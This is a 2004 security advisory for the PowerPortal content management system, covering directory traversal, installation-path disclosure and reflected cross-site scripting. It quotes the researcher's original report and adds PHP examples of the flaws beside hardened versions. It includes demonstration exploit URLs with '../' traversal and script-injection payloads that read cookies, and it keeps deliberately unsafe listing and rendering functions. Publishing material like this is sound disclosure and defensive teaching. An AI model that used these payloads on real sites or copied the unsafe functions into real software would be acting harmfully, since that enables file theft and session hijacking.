PowerPortal Input Validation Flaws Disclose Files to Remote Users and Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1010596
SecurityTracker URL: http://securitytracker.com/id?1010596
CVE Reference: CAN-2004-0662, CAN-2004-0663, CAN-2004-0664
Updated: Jul 15 2004
Original Entry Date: Jun 28 2004
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Version(s): 1.x
Description: DarkBicho reported a vulnerability in PowerPortal. A remote user can view files on the target system. A remote user can conduct cross-site scripting attacks and can also determine the installation path.
It is reported that the gallery module does not properly validate user-supplied input in the 'files' parameter. A remote user can
supply a specially crafted URL containing '../' directory traversal characters to view files on the target system with the privileges
of the target web service [CVE: CAN-2004-0664]. A demonstration exploit URL is provided:
http://[target]/modules.php?name=gallery&files=/../../../
It is also reported that a remote user can determine the installation path [CVE: CAN-2004-0662]. Some demonstration exploit URLs are provided:
http://[target]/modules/gallery/resize.php
http://[target]/power/modules.php?name=gallery&files=darkbicho
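The traversal and path-disclosure findings above both come from a gallery module that builds a filesystem path from the 'files' parameter and lets PHP warnings reach the client. The following PHP is an added example written for this entry, not PowerPortal's own code: it shows a listing routine of that shape in its unsafe form beside a hardened form. The GALLERY_ROOT location, the function names and the single-component naming rule are assumptions chosen for illustration.

```php
<?php
// Added example (not PowerPortal code): a gallery-style listing that takes a
// sub-directory name from the 'files' parameter, first the unsafe way and then
// hardened against '../' traversal and against path disclosure via warnings.
// Directory layout and function names are assumptions for illustration.

declare(strict_types=1);

// Assumed base directory of gallery images.
const GALLERY_ROOT = __DIR__ . '/modules/gallery/images';

// Unsafe: the user-controlled value is concatenated straight into the path,
// so files=/../../../ walks out of the images directory, and when the path is
// invalid the PHP warning prints the absolute path of this script to the client.
function listGalleryUnsafe(string $files): array
{
    $dir = GALLERY_ROOT . '/' . $files;
    $entries = [];
    foreach (scandir($dir) as $entry) {   // warning (with full path) if $dir is invalid
        if ($entry !== '.' && $entry !== '..') {
            $entries[] = $entry;
        }
    }
    return $entries;
}

// Hardened: accept only a single path component of safe characters, resolve
// the result with realpath() and confirm it still lies under GALLERY_ROOT.
// Returns null for anything that is not an existing gallery directory.
function listGallerySafe(string $files): ?array
{
    // One directory name only: letters, digits, underscore, hyphen.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $files)) {
        return null;
    }
    $root = realpath(GALLERY_ROOT);
    $dir  = realpath(GALLERY_ROOT . '/' . $files);
    if ($root === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    // realpath() has collapsed any '..' and followed symlinks, so a prefix
    // check against the resolved root is meaningful here.
    if (strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    $entries = [];
    foreach (scandir($dir) as $entry) {
        if ($entry !== '.' && $entry !== '..') {
            $entries[] = $entry;
        }
    }
    return $entries;
}

// Errors go to the server log, never into the response, so a bad parameter
// cannot reveal the installation path as the resize.php warnings above do.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$files = isset($_GET['files']) ? (string) $_GET['files'] : '';
$list  = listGallerySafe($files);
header('Content-Type: text/plain; charset=UTF-8');
if ($list === null) {
    http_response_code(400);
    echo "Invalid gallery name\n";
} else {
    foreach ($list as $entry) {
        echo $entry, "\n";
    }
}
```

The character allowlist alone already rejects the `/../../../` and `darkbicho` values from the demonstration URLs; the realpath() prefix check is kept as a second, independent control so that a symlink or a future relaxation of the naming rule cannot reopen the traversal. Turning off display_errors removes the path disclosure at its source rather than patching each warning site.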
It is also reported that various modules do not filter HTML code from user-supplied input before displaying the input [CVE: CAN-2004-0663].
A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be
executed by the target user's browser. The code will originate from the site running the PowerPortal software and will run in the
security context of that site. As a result, the code will be able to access the target user's cookies (including authentication
cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take
actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>
http://[target]/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results
http://[target]/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
http://[target]/modules.php?name=gallery&files=<script>alert(document.cookie);</script>
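Each of the URLs above reflects a query parameter into the page without encoding. The PHP below is an added example for this entry, not PowerPortal code: it renders a search-results fragment the unsafe way and then with context-appropriate output encoding, using the advisory's own payload as constructed input. The function names and the markup are assumptions for illustration.

```php
<?php
// Added example (not PowerPortal code): a search-results fragment that echoes
// the 'search' parameter, shown unencoded (reflected XSS) and with output
// encoding. Function names and markup are assumptions for illustration.

declare(strict_types=1);

// Unsafe: the raw value is placed into HTML, so a value containing
// <script>...</script> is parsed and executed by the browser.
function renderResultsUnsafe(string $search): string
{
    return '<p>Results for: ' . $search . '</p>'
         . '<input type="text" name="search" value=\'' . $search . '\'>';
}

// Encode for HTML text and attribute contexts. ENT_QUOTES also encodes the
// single quote, which is what the id='>... payload in the advisory relies on
// to break out of a single-quoted attribute. ENT_SUBSTITUTE keeps invalid
// UTF-8 from making the whole string encode to "".
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Safe: every interpolation goes through h(); attribute values are also
// double-quoted so the encoded quote characters cannot terminate them.
function renderResultsSafe(string $search): string
{
    return '<p>Results for: ' . h($search) . '</p>'
         . '<input type="text" name="search" value="' . h($search) . '">';
}

// Constructed input: the payload from the demonstration URLs above.
$payload = "'><script>alert(document.cookie);</script>";

// When run from the CLI there is no query string, so the payload is used;
// under a web server the 'search' parameter is rendered instead.
$search = isset($_GET['search']) ? (string) $_GET['search'] : $payload;
header('Content-Type: text/html; charset=UTF-8');
echo renderResultsSafe($search), "\n";
```

With the payload as input, renderResultsSafe() emits `&lt;script&gt;` in place of `<script>` and `&#039;&gt;` in place of `'>`, so the browser displays the text literally and runs nothing; renderResultsUnsafe() is kept only to make the difference visible side by side. Encoding at output time, per context, is the fix for every module listed in the advisory, since each one reflects a different parameter into the same kind of HTML.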
The vendor has reportedly been notified.
The original advisory is available at:
http://www.swp-zone.org/archivos/advisory-07.txt
Impact: A remote user can view files on the target system with the privileges of the target web service.
A remote user can determine the installation path.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PowerPortal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: No solution was available at the time of this entry.
Vendor URL: powerportal.sourceforge.net/
Cause: Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: DarkBicho <darkbicho@fastmail.fm>
Message History:
None.
Source Message Contents
Date: Sun, 27 Jun 2004 17:42:10 -0700
From: DarkBicho <darkbicho@fastmail.fm>
Subject: Multiple vulnerabilities PowerPortal
http://www.swp-zone.org/archivos/advisory-07.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PowerPortal :.:
PROGRAM: PowerPortal
HOMEPAGE: http://powerportal.sourceforge.net/
VERSION: v1.x
BUG: Multiple vulnerabilities
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
------------------------------
PowerPortal is a popular content management system, written in PHP.
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
:.: Examples:
* http://attacker/modules/gallery/resize.php
<br />
<b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>18</b><br />
<br />
<b>Warning</b>: imagecopyresized(): supplied argument is not a
valid Image resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>20</b><br />
<br />
<b>Warning</b>: imagejpeg(): supplied argument is not a valid Image
resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>23</b><br />
* http://attacker/power/modules.php?name=gallery&files=darkbicho
Warning:
opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
failed to open dir: Invalid argument in
c:\appserv\www\power\modules\gallery\index.php on
line 99
B. Cross-Site Scripting aka XSS:
http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>
http://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results
http://attacker/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
http://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script>
C. Arbitrary directory browsing:
* http://attacker/modules.php?name=gallery&files=/../../../
3.- SOLUTION:
--------
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PowerPortal website for updates and official release
details.
4.- Greetings:
---------
Greetings to my Peruvian group swp and perunderforce :D
"PISCO IS AND ALWAYS WILL BE PERUVIAN"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF ]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"
---------------------- The End ----------------------